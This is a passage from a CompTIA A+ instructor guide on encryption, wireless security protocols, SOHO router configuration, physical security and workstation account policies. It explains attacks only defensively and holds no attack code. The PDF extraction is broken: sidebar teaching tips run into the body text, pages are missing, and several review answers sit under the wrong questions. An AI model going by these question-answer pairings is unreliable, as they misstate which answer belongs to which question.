decrypt data. The secret key is so-called because it must be kept secret. If the key
is lost or stolen, the security is breached. Consequently, the main problem with
symmetric encryption is secure distribution and storage of the key. This problem
becomes exponentially greater the more widespread the key’s distribution needs
to be. The main advantage is speed. A symmetric cipher, such as the Advanced
Encryption Standard (AES), can perform bulk encryption and decryption of multiple
streams of data efficiently.
Asymmetric Encryption
An asymmetric encryption cipher uses a key pair. A key pair is a private key and
a public key that are mathematically linked. For any given message, either key can
perform either the encrypt or decrypt operation but not both. Only the paired key
can reverse the operation. For example, if the public key part is used to encrypt
a message, only the linked private key can be used to decrypt it. The public key
cannot decrypt what it has just encrypted.
A key pair can be used the other way around. If the private key is used to encrypt
something, only the public key can then decrypt it. The point is that one type of key
cannot reverse the operation it has just performed.
The private key must be kept a secret known only to a single subject (user or
computer). The public key can be widely and safely distributed to anyone with
whom the subject wants to communicate. The private key cannot be derived from
the public key.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 553
Key Exchange
Key exchange allows two hosts to know the same symmetric encryption key
without any other host finding out what it is. A symmetric cipher is much faster
than an asymmetric one, so it is often used to protect the actual data exchange in
a session. Asymmetric encryption only operates efficiently on data that is smaller
than the key size. This makes it well-suited to encrypt and exchange symmetric
cipher keys.
The sender uses the recipient’s public key to encrypt a secret key. The recipient
uses the private key to retrieve the secret key and then uses the secret key to
decrypt whatever data message was transmitted by the sender. In this context,
the symmetric cipher secret key is also referred to as a session key. If it is changed
often, it is also referred to as an ephemeral key.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
554 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Attacks, Threats, and Vulnerabilities
3
A phishing attack tries to make users authenticate with a fake resource, such as
a website. Phishing emails are often sent in mass as spam. This is a variant of
phishing called spear phishing because it is specifically targeted at a single person,
using personal information known about the subject (his or her football-coaching
volunteer work).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 555
5. You discover that a threat actor has been able to harvest credentials
from some visitors connecting to the company’s wireless network from
the lobby. The visitors had connected to a network named “Internet”
and were presented with a web page requesting an email address and
password to enable guest access. The company’s access point had been
disconnected from the cabled network. What type of attack has been
perpetrated?
This is an evil twin attack where the threat actor uses social engineering techniques
to persuade users to connect to an access point that spoofs a legitimate guest
network service.
6. A threat actor recovers some documents via dumpster diving and learns
that the system policy causes passwords to be configured with a random
mix of different characters that are only five characters in length. To
what type of password cracking attack is this vulnerable?
Brute force attacks are effective against short passwords. Dictionary attacks depend
on users choosing ordinary words or phrases in a password.
A digital certificate is a wrapper for a subject’s public key. The public and private
keys in an asymmetric cipher are paired. If one key is used to encrypt a message,
only the other key can then decrypt it.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
556 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 16B
Show
Slide(s)
Compare Wireless
Security Protocols
Teaching
Tip
This topic covers the
Compare Wireless Security Protocols
implementation of 8
basic cryptography
concepts in wireless CORE 2 EXAM OBJECTIVES COVERED
security protocols. The 2.2 Compare and contrast wireless security protocols and authentication methods.
protocols discussed
here are complex, but
the aim is to allow the
student to understand You must make sure that the devices attached to your network are only being
and compare their
operated by authorized users, especially when users can connect wirelessly.
uses without having
to delve into the detail Understanding the types of wireless security protocols and authentication methods
of how they operate. will help you to configure secure network settings.
However, be prepared
to spend extra time on
this topic. Wi-Fi Protected Access
Show Wireless LANs require careful configuration to make the connection and
Slide(s) transmissions over the link secure. The main problem with wireless is that because
it is unguided, there is no way to prevent anything within range from listening to
Wi-Fi Protected Access
the signals. If the wireless traffic is unencrypted, this could allow the interception of
Teaching data or the unauthorized use of the network.
Tip
Explain that a Wi-Fi
Temporal Key Integrity Protocol
security mechanism
The first version of Wi-Fi Protected Access (WPA) was designed to fix critical
derives a key so that
traffic between the vulnerabilities in the earlier wired equivalent privacy (WEP) standard. Like WEP,
station and access version 1 of WPA uses the RC4 symmetric cipher to encrypt traffic but adds a
point is encrypted. mechanism called the Temporal Key Integrity Protocol (TKIP) to try to mitigate
Anyone can intercept the various attacks against WEP that had been developed.
the traffic, but it can
only be deciphered WPA2
using the key. Lots
of faults that allow Neither WEP nor the original WPA version are considered secure enough for
attackers to recover
the key have been
continued use. Even with TKIP, WPA is vulnerable to various types of replay attack
discovered over that aim to recover the encryption key. WPA2 uses the Advanced Encryption
the years, meaning Standard (AES) cipher deployed within the Counter Mode with Cipher Block
that the standards Chaining Message Authentication Code Protocol (CCMP). AES replaces RC4 and
have needed regular CCMP replaces TKIP. CCMP provides authenticated encryption, which is designed to
updates.
make replay attacks harder.
TKIP was used to fix
the very serious issues Some access points allow WPA2 to be used in WPA2-TKIP or WPA2-TKIP+AES
in the earlier Wired compatibility mode. This provides support for legacy clients at the expense of
Equivalent Privacy
weakening the security. It is better to select WPA2-AES.
(WEP) standard but
has its own flaws.
AES replaced the
older, vulnerable
cryptographic cipher
(RC4) completely.
WPA3 fixes flaws in
the 4-way handshake
and represents the
strongest available
Wi-Fi security method.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 557
Configuring a TP-LINK SOHO access point with wireless encryption and authentication settings.
In this example, the 2.4 GHz band allows legacy connections with WPA2-Personal security,
while the 5 GHz network is for 802.11ax (Wi-Fi 6)-capable devices using WPA3-SAE
authentication. (Screenshot courtesy of TP-Link.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
558 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The configuration interfaces for access points can use different labels for these methods.
You might see WPA2-Personal and WPA3-SAE rather than WPA2-PSK and WPA3-
Personal, for example. Additionally, an access point can be configured for WPA3 only or
with support for legacy WPA2 (WPA3-Personal Transition mode). Enabling compatibility
supports legacy clients at the expense of weakening security.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 559
2. On the wireless device, the private key is stored securely in a trusted platform
module (TPM) or USB key. The user must authenticate with the device using a
PIN, password, or bio gesture to allow use of the key. This is the first factor.
3. When the device associates with the network and starts an EAP session, the
server sends a digital signature handshake and its certificate.
4. The supplicant validates the signature and certificate and if trusted, sends its
own handshake and certificate. This is the second factor.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
560 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Show
Slide(s)
RADIUS, TACACS+,
and Kerberos
Teaching
Tip
To explain how
RADIUS/TACACS+ and
Kerberos can be used
together, step back
a little and explain
the whole enterprise
authentication
and authorization
architecture, using
Windows AD as the
main example. Explain
that the network
directory/account
store (Active Directory)
is a high-value asset
and shouldn’t be
exposed on an edge
device such as an
access point (it also
takes more resources
Configuring Network Policy Server to authenticate wireless clients using 802.1X EAP-TLS.
to run than a typical
access point has). (Screenshot courtesy of Microsoft.)
Local wired clients can
authenticate directly
to AD via Kerberos. Other methods of EAP use a certificate on the AAA server only. The AAA server
Kerberos is an SSO uses the certificate to create an encrypted tunnel for the supplicant to send a
protocol that can username/password credential securely.
handle authentication
and authorization for
multiple application
services through the RADIUS, TACACS+, and Kerberos
use of tickets. This
means that the client Enterprise authentication uses an AAA server and network directory. These
device is already
components can be implemented by several different protocols.
active on the network,
however, which
raises several security RADIUS
risks even if the user
account isn’t yet Remote Authentication Dial-in User Service (RADIUS) is one way of
authenticated. implementing the AAA server when configuring enterprise authentication. The
Access points use wireless access point is configured as a client of the RADIUS server. Rather than
an AAA protocol storing and validating user credentials directly, it forwards this data between the
such as RADIUS—on RADIUS server and the supplicant without being able to read it. The wireless access
Windows Server point must be configured with the host name or IP address of the RADIUS server
this is implemented and a shared secret. The shared secret allows the RADIUS server and access point
as Network Policy
to trust one another.
Server (NPS)—to
shuttle authentication
and authorization TACACS+
traffic between
the supplicant and Terminal Access Controller Access Control System Plus (TACACS+) is another
the AAA. The AAA way of implementing AAA. TACACS+ was developed by Cisco but is also supported
server uses LDAP to on many third-party implementations. Where RADIUS is often used to authenticate
communicate with connections by wireless and VPN users, TACACS+ is often used in authenticating
the directory service
administrative access to routers, switches, and access points.
(AD). The access point
has no user account
credentials configured
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 561
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
562 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Wireless Security Protocols
9
Teaching
1. True or false. TKIP represents the best available wireless encryption and
Tip
should be configured in place of AES if supported.
Take some time at False. Advanced Encryption Standard (AES) provides stronger encryption and is
the end of each topic enabled by selecting Wi-Fi Protected Access (WPA) version 2 with AES/CCMP or
to answer questions.
You can use the
WPA3 encryption mode. The Temporal Key Integrity Protocol (TKIP) attempts to
review questions fix problems with the older RC4 cipher used by the first version of WPA. TKIP and
for discussion in WPA1 are now deprecated.
class or set them for
students to complete 2. True or false? WPA3 personal mode is configured by selecting a
individually during or passphrase shared between all users who are permitted to connect to
after class. the network.
AAA refers to Authentication, Authorization, and Accounting and the Remote Access
Dial-in User Service (RADIUS) protocol is one way of implementing this architecture.
The RADIUS server is positioned on the internal network and processes
authentication and authorization requests. The RADIUS client is the access point,
and it must be configured with the IP address of the server plus a shared secret
passphrase. The access point forwards authentication traffic between the end-user
device (a supplicant) and the RADIUS server but cannot inspect the traffic.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 563
Topic 16C
Show
Slide(s)
Configure SOHO
Router Security
Teaching
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
564 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Power on the router. Connect a computer to an RJ45 LAN port to start the home
router setup process. LAN ports on a home router are usually color-coded yellow.
Make sure the computer is set to obtain an IP address automatically. Wait for
the Dynamic Host Configuration Protocol (DHCP) server running on the router to
allocate a valid IP address to the computer.
Use a browser to open the device’s management URL, as listed in the
documentation. This could be an IP address or a host/domain name, such as
http://192.168.0.1 or http://www.routerlogin.com
It might use HTTPS rather than unencrypted HTTP. If you cannot connect, check that
the computer’s IP address is in the same range as the device IP.
The home router management software will prompt you to change the default
password to secure the administrator account. Enter the default password (as
listed in the documentation or printed on a sticker accompanying the router/
modem). Choose a new, strong password of 12 characters or more. If there is also
an option to change the default username of the administrator account, this is also
a little bit more secure than leaving the default configured.
Firmware Update
Show You should keep the firmware and driver for the home router up to date with
Slide(s) the latest patches. This is important because it allows you to fix security holes
Firmware Update and support the latest security standards, such as WPA3. To perform a firmware
update, download the update from the vendor’s website, taking care to select
Interaction the correct patch for your device make and model. In the management app,
Opportunity select the Firmware Upgrade option and browse for the firmware file you
If you have Internet downloaded.
access, get students
Make sure that power to the device is not interrupted during the update process.
to locate the firmware
download on a vendor
site.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 565
Encryption Settings
The encryption or security option allows you to set the authentication mode. You
should set the highest standard supported by the client devices that need to connect.
1. Ideally, select WPA3. If necessary, enable compatibility support for WPA2 (AES/
CCMP) or even WPA2 (TKIP). Remember that enabling compatibility weakens
the security because it allows malicious stations to request a downgraded
security type.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
566 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Configuring security settings on a TP-LINK home router. This configuration allows WPA
compatibility mode, which is less secure. (Screenshot courtesy of TP-Link.)
Changing Channels
For each radio frequency band (2.4 GHz, 5 GHz, and 6 GHz), there will be an option
to autoconfigure or select the operating channel. If set to auto-detect, the access
point will select the channel that seems least congested at boot time. As the
environment changes, you may find that this channel selection is not the optimum
one. You can use a Wi-Fi analyzer to identify which channel within the access point’s
range is least congested.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 567
Configuring parental control content-filtering to restrict when certain devices can access the
network on a TP-LINK home router. (Screenshot courtesy of TP-Link.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
568 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 569
Port triggering is used to set up applications that require more than one port, such
as file transfer protocol (FTP) servers. Basically, when the firewall detects activity on
outbound port A destined for a given external IP address, it opens inbound access
for the external IP address on port B for a set period.
Universal Plug-and-Play
Port forwarding/port triggering is challenging for end users to configure correctly. Show
Many users would simply resort to turning the firewall off to get a particular Slide(s)
application to work. As a means of mitigating this attitude, services that require Universal
complex firewall configuration can use the Universal Plug-and-Play (UPnP) Plug-and-Play
framework to send instructions to the firewall with the correct configuration
parameters. Interaction
Opportunity
On the firewall, check the box to enable UPnP. A client UPnP device, such as an
If you have Internet
Xbox, PlayStation, or voice-over-IP handset, will be able to configure the firewall access, have students
automatically to open the IP addresses and ports necessary to play an online game research UPnP
or place and receive VoIP calls. vulnerabilities and
make their own
determination about
whether it’s safe
to use.
There is nothing to configure when enabling UPnP, but when client devices use the service, the rules
they have configured on the firewall are shown in the service list. (Screenshot courtesy of TP-Link.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
570 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
UPnP is associated with many security vulnerabilities and is best disabled if not
required. You should ensure that the router does not accept UPnP configuration
requests from the external (Internet) interface. If using UPnP, keep up to date with
any security advisories or firmware updates from the router manufacturer.
Also make sure that UPnP is disabled on client devices unless you have confirmed that
the implementation is secure. As well as game consoles, vulnerabilities have been found
in UPnP running on devices such as printers and web cams.
Screened Subnets
Show When making a server accessible on the Internet, careful thought needs to be given to the
Slide(s) security of the local network. If the server target of a port-forwarding rule is compromised,
Screened Subnets because it is on the local network there is the possibility that other LAN hosts can be
attacked from it or that the attacker could examine traffic passing over the LAN.
Teaching
In an enterprise network, a screened subnet is a means of establishing a more
Tip
secure configuration. A screened subnet can also be referred to by the deprecated
terminology demilitarized zone (DMZ). The idea of a screened subnet is that some
This is always tricky to
explain in the context
hosts are placed in a separate network segment with a different IP subnet address
of home routers, range than the rest of the LAN. This configuration uses either two firewalls or a
and the change of firewall that can route between at least three interfaces. Separate rules and filters
terminology has apply to traffic between the screened subnet and the Internet, between the Internet
made it even more and the LAN, and between the LAN and the screened subnet.
troublesome.
Start by explaining the
concept of a screened
subnet as deployed in
an enterprise network
where an isolated
segment is created
for hosts that are
accessible from the
Internet and therefore
should not be fully
A screened subnet topology. (Images © 123RF.com.)
trusted by hosts on
the LAN. Note that
the key point about Most home routers come with only basic firewall functionality. The firewall in a typical
this configuration is home router screens the local network rather than establishing a screened subnet.
that different rules
apply between the However, you should be aware of the way that many home router vendors use term
various segments. DMZ. On a home router, a “DMZ” or “DMZ host” configuration is likely to refer to a
Explain that this was
computer on the LAN that is configured to receive communications for any ports
previously known
as a DMZ. Note that that have not been forwarded to other hosts. When DMZ is used in this sense, it
most service-provider- means “not protected by the firewall” as the host is fully accessible to other Internet
supplied routers will hosts (though it could be installed with a host firewall instead).
not support this type
of configuration or any
type of routing other
than NAT overloading.
With that definition
established, note
that some home-
router vendors use
DMZ or DMZ host to
describe a different
configuration—
disabling inbound
filtering for a given
host.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 571
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
572 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
SOHO Router Security
6
• Encryption settings
• Changing channels
3. You are assisting a user with setting up Internet access to a web server
on a home network. You want to configure a DHCP reservation to set the
web server’s IP address, allow external clients to connect to the secure
port TCP/443, but configure the web server to listen on port TCP/8080. Is
this configuration possible on a typical home router?
Yes. You need to configure a port-mapping rule so that the router takes requests
arriving at its WAN IP for TCP/443 and forwards them to the server’s IP address on
TCP/8080. Using a known IP address for the server by configuring a Dynamic Host
Configuration Protocol (DHCP) reservation simplifies this configuration. The home
router’s DHCP server must be configured with the media access control (MAC)
address or hardware identifier of the web server.
Probably not. Using a home router’s “demilitarized zone” or DMZ host option
forwards traffic for all ports not covered by specific port-forwarding rules to the
host. It is possible to achieve a secure configuration with this option by blocking
unauthorized ports and protecting the host using a personal firewall, but using
specific port-forwarding/mapping rules is better practice. The most secure solution
is to isolate the game server in a screened subnet so that is separated from other
LAN hosts, but this typically requires multiple router/firewalls.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 573
Topic 16D
Summarize Security Measures
5
Perimeter security uses barricades, fences, lighting, and surveillance to control and Teaching
monitor who can approach the building or campus. Sites where there is a risk of a Tip
terrorist attack will use barricades such as bollards and security posts to prevent
Explain options for
vehicles from crashing into the building or exploding a bomb near it. managing the primary
Security fencing needs to be transparent (so that guards can see any attempt to entrance to a facility.
penetrate it), robust (so that it is difficult to cut), and secure against climbing (which
is generally achieved by making it tall and possibly by using razor wire). Fencing
is generally effective, but the drawback is that it gives a building an intimidating
appearance. Buildings that are used by companies to welcome customers or the
public may use more discreet security methods.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
574 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Magnetometers
Surveillance at the building entrance might be enhanced by deploying a walk-
through or handheld magnetometer. This type of metal detector is often deployed
at airports and in public buildings to identify concealed weapons or other items.
Security Guards
Human security guards can be placed in front of and around a location to protect it.
They can monitor critical checkpoints and verify identification, allow or disallow access,
and log physical entry occurrences. They also provide a visual deterrent and can apply
their own knowledge and intuition to mitigating potential security breaches.
Lock Types
Show A door lock controls entry and exit from a building, room, or other area without
Slide(s) necessarily needing a guard, depending on the risk of tailgating and piggybacking
Lock Types being an issue.
• Badge reader—Some types of electronic lock work with a hardware token rather
than a PIN. The token might be a basic magnetic swipe card. A more advanced
type of lock works with a cryptographic contactless smart card or key fob.
These are much more difficult to clone than ordinary swipe cards.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 575
• Retina scanner—An infrared light is shone into the eye to identify the pattern
of blood vessels. The arrangement of these blood vessels is highly complex and
typically does not change from birth to death, except in the event of certain
diseases or injuries. Retinal scanning is therefore one of the most accurate forms
of biometrics. Retinal patterns are very secure, but the equipment required is
expensive and the process is relatively intrusive and complex. False negatives
can be produced by diseases such as cataracts.
Other general issues with biometrics include privacy issues with capturing and
storing personal information and discriminatory issues involving people who cannot
make the required bio gesture.
Equipment Locks
There are several types of equipment locks that act to prevent unauthorized
physical access to servers and network appliances or prevent theft:
• Kensington locks are used with a cable tie to secure a laptop or other device to a
desk or pillar and prevent its theft.
• Chassis locks and faceplates prevent the covers of server equipment from being
opened. These can prevent access to external USB ports and prevent someone
from accessing the internal fixed disks.
• Lockable rack cabinets control access to servers, switches, and routers installed
in standard network racks. These can be supplied with key-operated or
electronic locks.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
576 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Proximity—Radio frequency ID (RFID) tags and readers can be used to track the
movement of tagged objects within an area. This can form the basis of an alarm
system to detect whether someone is trying to remove equipment.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 577
Review Activity:
Security Measures
6
1. You are assisting with the design of a new campus building for a Teaching
multinational firm. On the recommendation of a security consultant, the Tip
architect has added closely spaced sculpted stone posts with reinforced Take some time at
steel cores that surround the area between the building entrance and the end of each topic
to answer questions.
the street. At the most recent client meeting, the building owner has You can use the
queried the cost of these. Can you explain their purpose? review questions
for discussion in
These bollards are designed to prevent vehicles from crashing into the building class or set them for
lobby as part of a terrorist or criminal attack. The security consultant should only students to complete
recommend the control if the risk of this type of attack justifies the expense. individually during or
after class.
2. Katie works in a high-security government facility. When she comes to
work in the morning, she places her hand on a scanning device installed
at a turnstile in the building lobby. The scanner reads her palmprint and
compares it to a master record of her palmprint in a database to verify
her identity. What type of security control is this?
A lockable faceplate controls who can access the power button, external ports,
and internal components. This mitigates the risk of someone gaining access to
the server room via social engineering. It also mitigates risks from insider threat
by rogue administrators, though to a lesser extent (each request for a chassis key
would need to be approved and logged).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
578 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Lesson 16
Summary
4
Show You should be able to explain common social-engineering attacks, threats, and
Slide(s) vulnerabilities; configure appropriate wireless security protocol/authentication and
Summary firewall settings on a SOHO network; and summarize physical security measures.
• Threats and attacks such as insider threat, DoS, DDoS, zero-day, spoofing,
on-path, brute-force, and dictionary, SQL injection, and XSS.
• Door and equipment locks (badge reader, key fobs, smart cards, keys, and
retina/fingerprint/palmprint biometric scanners.
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 17
Managing Security Settings
1
LESSON INTRODUCTION
Firewalls provide a security border around a network, but this secure border is not Show
sufficient to protect against insider threat, advanced malware, or sophisticated Slide(s)
threat-actor tactics and techniques. Most organizations deploy defense in depth Objectives
controls to ensure that each endpoint—computer, laptop, smartphone, or tablet—is
deployed in a hardened configuration in terms of both the OS and the web browser Teaching
software. Tip
Despite best efforts to assess risks and deploy countermeasures, most networks This lesson continues
the security theme by
will suffer from security incidents. As a CompTIA A+ technician, you will need to be focusing on security
able to use best practice methods and tools to identify and eliminate malware and controls for individual
other intrusions to minimize the impact of these incidents. workstations and
browser software.
Lesson Objectives
In this lesson, you will:
• Configure workstation security.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
580 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 17A
Configure Workstation Security
Show
Slide(s)
2
Teaching
Password-based authentication systems have a long history of vulnerability. Some
Tip
of this ineffectiveness is due to inadequate technologies and some due to poor user
password practice. As not all companies can make the switch to multifactor sign-in,
Remind students
that complexity
password best practice is still a key security requirement.
requirements are The biggest vulnerability of knowledge factor authentication to cyberattack is the
necessary to mitigate
use of weak passwords. A threat actor might use dictionary files containing popular
risks from brute force
and dictionary attacks, words and phrases or strings from breached password databases to compromise
but do note that account credentials. Once a threat actor obtains a password, she or he can gain
the status of some access to a system posing as that person.
of these attributes
as best practice is Password Rules
no longer firmly
established. The following rules are easy for users to apply and make passwords more difficult
Length is preferable to crack:
to use of highly cryptic
mixing of character • Make the password sufficiently long—12+ character length is suitable for an
types. Requiring a ordinary user account. Administrative accounts should have longer passwords.
mix of character
types forces users • Choose a memorable phrase, but do not use any personal information—
into selecting easily Anything that a threat actor could discover or guess should not be used in
masked substitutions a password. This includes things such as significant dates, family names,
(zero for oh, for username, job title, company name, pet name, quotations, and song lyrics.
instance) or makes
passwords impossible Some password policies impose complexity requirements beyond minimum
to remember and
causes users to write
length. Rules might specify that the password must contain a given mix of character
them down. The latest types: uppercase and lowercase letters, numbers, and symbols. A password policy
NIST guidance also may have an expiration requirement, which means that the user must change the
deprecates password password after a set period.
expiration except
when a breach is
discovered.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 581
Using the local Group Policy editor to view password policies. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
582 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Personal data is typically protected by regulations and legislation. Making any sort of
unauthorized copy of this data is often illegal. It should only typically be stored and
processed in systems that are configured and monitored by a data owner.
Account Management
Show Account management policies are used to determine what rights and privileges
Slide(s) each employee should be assigned. These policies should be guided by the principle
Account Management
of least privilege.
Some networks have complex requirements for assigning rights, but the basic
principle is that the number of accounts with administrator/superuser privileges
should be as few as possible. These highly privileged accounts should be further
protected by features such as UAC and sudo. For both file permissions and rights, a
system of least privilege will be most effective in reducing risk.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 583
Account Policies
Account policies supplement best practice behavior by enforcing requirements as Show
controls imposed by the OS. On a standalone workstation, password and account Slide(s)
policies can be configured via the Local Security Policy snap-in (secpol.msc) or
Account Policies
the Group Policy Editor snap-in (gpedit.msc). On a Windows domain network,
settings can be defined as group policy objects (GPO) and applied to groups of user Teaching
and computer accounts within domains and organizational units (OUs). Tip
Explain that these
These tools are not available in the Home edition of Windows. options can be
configured as policies,
either on a local
workstation or via a
group policy targeting
a domain or OU.
• Restrict login times—This is typically used to prevent an account from logging
in at an unusual time of the day or night or during the weekend. Periodically,
the server checks whether the user has the right to continue using the network.
If the user does not have the right, then an automatic logout procedure
commences.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
584 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Using the Properties dialog box to unlock a user account. (Screenshot courtesy of Microsoft.)
If a user forgets a password, you can reset it by right-clicking the account and
selecting Reset Password.
Execution Control
Show Authentication and authorization policies give subjects the right to sign-on
Slide(s) to a computer and network and (potentially) to make changes to the system
Execution Control configuration. This places a certain amount of trust in the user to exercise those
rights responsibly. Users can act maliciously, though, or could be tricked into an
adverse action. Execution control refers to logical security technologies designed
to prevent malicious software from running on a host regardless of what the user
account privileges allow. Execution control can establish a security system that does
not entirely depend on the good behavior of individual users.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 585
Configuring AutoPlay. D3300 is a digital camera that has been connected to the computer
previously. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
586 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Windows Defender Antivirus configuration page within the Windows Security app.
(Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 587
For Windows Defender Antivirus, these definitions and patches are delivered
via Windows Update. Third-party software might also integrate its updates with
Windows Update, or it might use its own updater.
The Real-time protection setting can be toggled off to disable Windows Defender
Antivirus temporarily. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
588 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Application security triggers are based on the process that listens for
connections.
• Address triggers are based on the IP or FQDN of the server or client hosts.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 589
Block stops traffic unless a specific rule allows it. Conversely, Allow accepts all traffic
unless a specific rule blocks it. You can also use Block all connections to stop inbound
connections regardless of the rules set up.
From the main Advanced Firewall console, you enable, disable, and configure rules
by selecting in the Inbound Rules or Outbound Rules folder as appropriate.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
590 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
To apply encryption, open the file’s or folder’s property sheet and select the
Advanced button. Check the Encrypt contents box, then confirm the dialogs.
Folders and files that have been encrypted can be shown with green color coding in
Explorer. Any user other than the one who encrypted the file will receive an “Access
Denied” error when trying to browse, copy, or print the file.
A file that has been encrypted cannot be opened by other users—even administrators.
(Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 591
Without strong authentication, encrypted data is only as secure as the user account
password. If the password can be compromised, then so can the data. The user’s
password grants access to the key that performs the file encryption and decryption.
There is also the chance of data loss if the key is lost or damaged. This can happen
